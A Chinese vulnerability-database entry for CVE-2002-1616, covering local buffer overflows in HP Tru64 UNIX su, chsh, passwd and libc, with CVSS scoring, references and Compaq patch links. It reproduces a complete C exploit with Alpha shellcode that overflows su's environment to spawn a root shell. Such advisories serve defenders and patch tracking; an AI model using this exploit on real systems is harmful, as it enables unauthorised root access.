CVE-2002-1616
CVSS7.2
发布时间 :2002-08-01 00:00:00
修订时间 :2011-03-07 21:10:32
NMCOE    

[原文]Multiple buffer overflows in HP Tru64 UNIX 5.1a, 5.1, 5.0a, 4.0g, and 4.0f allow local users to gain root privileges via (1) su, (2) chsh, (3) passwd, (4) chfn, (5) dxchpwd, and (6) libc.


[CNNVD]Tru64 chsh本地权限提升漏洞(CNNVD-200208-002)

        
        Tru64是一款由HP公司开发的Unix操作系统,其中包含chsh工具可以用来更改当前用户相关信息。
        Tru64中的chsh工具存在漏洞,本地攻击者可以利用这个漏洞提升权限。
        部分HP Tru64操作系统的chsh工具存在问题,允许非特权用户获得root用户权限。
        没有具体技术细节描述。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:hp:tru64:5.1HP Compaq Tru64 5.1
cpe:/o:hp:tru64:4.0gHP Tru64 4.0g
cpe:/o:hp:tru64:5.1afHP Tru64 UNIX 5.1af
cpe:/o:hp:tru64:4.0fHP Tru64 4.0f
cpe:/o:hp:tru64:5.0aHP Tru64 5.0a

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1616
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1616
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-002
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/193347
(PATCH)  CERT-VN  VU#193347
http://www.kb.cert.org/vuls/id/671627
(VENDOR_ADVISORY)  CERT-VN  VU#671627
http://www.kb.cert.org/vuls/id/177067
(VENDOR_ADVISORY)  CERT-VN  VU#177067
http://www.kb.cert.org/vuls/id/137555
(VENDOR_ADVISORY)  CERT-VN  VU#137555
http://xforce.iss.net/xforce/xfdb/10614
(PATCH)  XF  tru64-chfn-bo(10614)
http://www.securityfocus.com/bid/5382
(PATCH)  BID  5382
http://www.securityfocus.com/bid/5381
(PATCH)  BID  5381
http://www.securityfocus.com/bid/5380
(PATCH)  BID  5380
http://archives.neohapsis.com/archives/tru64/2002-q3/0019.html
(PATCH)  HP  SSRT2190
http://xforce.iss.net/xforce/xfdb/11620
(VENDOR_ADVISORY)  XF  tru64-dxchpwd-bo(11620)
http://www.securityfocus.com/bid/5379
(VENDOR_ADVISORY)  BID  5379
http://www.securityfocus.com/archive/1/290115
(VENDOR_ADVISORY)  BUGTRAQ  20020902 Happy Labor Day from Snosoft
http://www.blacksheepnetworks.com/security/hack/tru64/TRU64_su.txt
(UNKNOWN)  MISC  http://www.blacksheepnetworks.com/security/hack/tru64/TRU64_su.txt
http://archives.neohapsis.com/archives/tru64/2002-q3/0019.html
(UNKNOWN)  HP  SSRT2192
http://archives.neohapsis.com/archives/tru64/2002-q3/0019.html
(UNKNOWN)  HP  SSRT2257
http://archives.neohapsis.com/archives/tru64/2002-q3/0019.html
(UNKNOWN)  HP  SSRT2259
http://archives.neohapsis.com/archives/fulldisclosure/2002-q3/1203.html
(UNKNOWN)  FULLDISC  20020919 iDEFENSE OSF1/Tru64 3.x vuln clarification
http://archives.neohapsis.com/archives/fulldisclosure/2002-q3/1203.html
(UNKNOWN)  BUGTRAQ  20020919 iDEFENSE OSF1/Tru64 3.x vuln clarification

- 漏洞信息

Tru64 chsh本地权限提升漏洞
高危 边界条件错误
2002-08-01 00:00:00 2005-10-20 00:00:00
远程※本地  
        
        Tru64是一款由HP公司开发的Unix操作系统,其中包含chsh工具可以用来更改当前用户相关信息。
        Tru64中的chsh工具存在漏洞,本地攻击者可以利用这个漏洞提升权限。
        部分HP Tru64操作系统的chsh工具存在问题,允许非特权用户获得root用户权限。
        没有具体技术细节描述。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时没有合适的临时解决方法。
        厂商补丁:
        Compaq
        ------
        Compaq已经为此发布了一个安全公告(SSRT2257)以及相应补丁:
        SSRT2257:HP Tru64 UNIX /usr/bin/su buffer overflow potential exploit
        链接:
        http://wwss1pro.compaq.com/support/reference_library/viewdocument.asp?countrycode=1000&prodid=811|Tr

        补丁下载:
        Compaq Tru64 4.0 g:
        Compaq Patch t64v40gb17-c0010404-14948-es-20020730.tar
        
        http://ftp.support.compaq.com/patches/public/unix/v4.0g/t64v40gb17-c0010404-14948-es-20020730.tar

        Compaq Tru64 4.0 f:
        Compaq Patch duv40fb18-c0067403-14947-es-20020730.tar
        
        http://ftp.support.compaq.com/patches/public/unix/v4.0f/duv40fb18-c0067403-14947-es-20020730.tar

        Compaq Tru64 5.0 a:
        Compaq Patch t64v50ab17-c0018404-14949-es-20020730.tar
        
        http://ftp.support.compaq.com/patches/public/unix/v5.0a/t64v50ab17-c0018404-14949-es-20020730.tar

        Compaq Tru64 5.1 a:
        Compaq Patch t64v51ab2-c0041400-14950-es-20020730.tar
        
        http://ftp.support.compaq.com/patches/public/unix/v5.1a/t64v51ab2-c0041400-14950-es-20020730.tar

        Compaq Tru64 5.1:
        Compaq Patch t64v51b19-c0136900-14951-es-20020730.tar
        
        http://ftp.support.compaq.com/patches/public/unix/v5.1/t64v51b19-c0136900-14951-es-20020730.tar

- 漏洞信息 (259)

Tru64 5 (su) Env Local Stack Overflow Exploit (EDBID:259)
tru64 local
2001-01-26 Verified
0 k2
N/A [点击下载]
/*      Copyright (c) 2000 ADM                                  */
/*      All Rights Reserved                                     */
/*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM      */
/*      The copyright notice above does not evidence any        */
/*      actual or intended publication of such source code.     */
/*                                                              */
/*      Title:        Tru64 5 su                                */
/*      Tested under: Tru64 5A  (OSF/1)                         */
/*      By:           K2  (thx horizon,lamont :)                */
/*      Use:          cc -o tru64-su tru64-su.c                 */
/*      Issues:       Tru64 re-implmented non-exec patch,       */
/*                    I'm working on non-exec alpha technique   */
/*                    so it will only work if,                  */
/*                    do this -> "sysconfig -q proc executable_stack" */
/*                    and see if -> "executable_stack = 1"      */
/*                    else?                                     */
/*                    wait for new alpha non-exec stack exploit */
/*                                                              */


#include <unistd.h>
#include <stdlib.h>
#include <strings.h>
#include <string.h>
#include <stdio.h>

#define BUFSIZE 8241
char *nop                               = "\x1f\x04\xff\x47";
char *retaddr                   = "\xe4\xc0\xff\x1f\x01\x00\x00\x00";

/* lamont's shellcode */

int rawcode[] = {
  0x2230fec4,              /* subq $16,0x13c,$17 [2000]*/
  0x47ff0412,              /* clr $18            [2000]*/
  0x42509532,              /* subq $18, 0x84     [2000]*/
  0x239fffff,              /* xor $18, 0xffffffff, $18 */
  0x4b84169c,
  0x465c0812,
  0xb2510134,              /* stl $18, 0x134($17)[2000]*/
  0x265cff98,              /* lda $18, 0xff978cd0[2000]*/
  0x22528cd1,
  0x465c0812,              /* xor $18, 0xffffffff, $18 */
  0xb2510140,              /* stl $18, 0x140($17)[2000]*/
  0xb6110148,              /* stq $16,0x148($17) [2000]*/
  0xb7f10150,              /* stq $31,0x150($17) [2000]*/
  0x22310148,              /* addq $17,0x148,$17 [2000]*/
  0x225f013a,              /* ldil $18,0x13a     [2000]*/
  0x425ff520,              /* subq $18,0xff,$0   [2000]*/
  0x47ff0412,              /* clr $18            [2000]*/
  0xffffffff,              /* call_pal 0x83      [2000]*/
  0xd21fffed,              /* bsr $16,$l1    ENTRY     */
  0x6e69622f,              /* .ascii "/bin"      [2000]*/
  /* .ascii "/sh\0" is generated */
};

int main(int argc, char **argv)
{
  char buf[BUFSIZE+4];
  char *env[2];
  char *cp,*rc;
  int i;

  if(argc > 1) retaddr[0]+=atoi(argv[1]);

  memset(&buf,'A',BUFSIZE-8);
  cp=(char *) &(buf[BUFSIZE-8]);

  for (i=0;i<8;i++)
    *cp++=retaddr[i];

  rc=(char *)rawcode;
  cp=buf;

  for(i=0;i<8;i++)
    *cp++ = 0x6e;

  for(i=0;i<72;i++)
    *cp++ = rc[i];
  for(i=0;i<320;i++)
    *cp++ = nop[i % 4];
  *cp++=rc[72]-80;
  for(i=1;i<8;i++)
    *cp++ = rc[i+72];

  env[1]=NULL;

  execle("/usr/bin/su","su",buf, NULL,env);
  return(0);
}


// milw0rm.com [2001-01-26]
		

- 漏洞信息

18203
HP Tru64 UNIX su Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-09-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站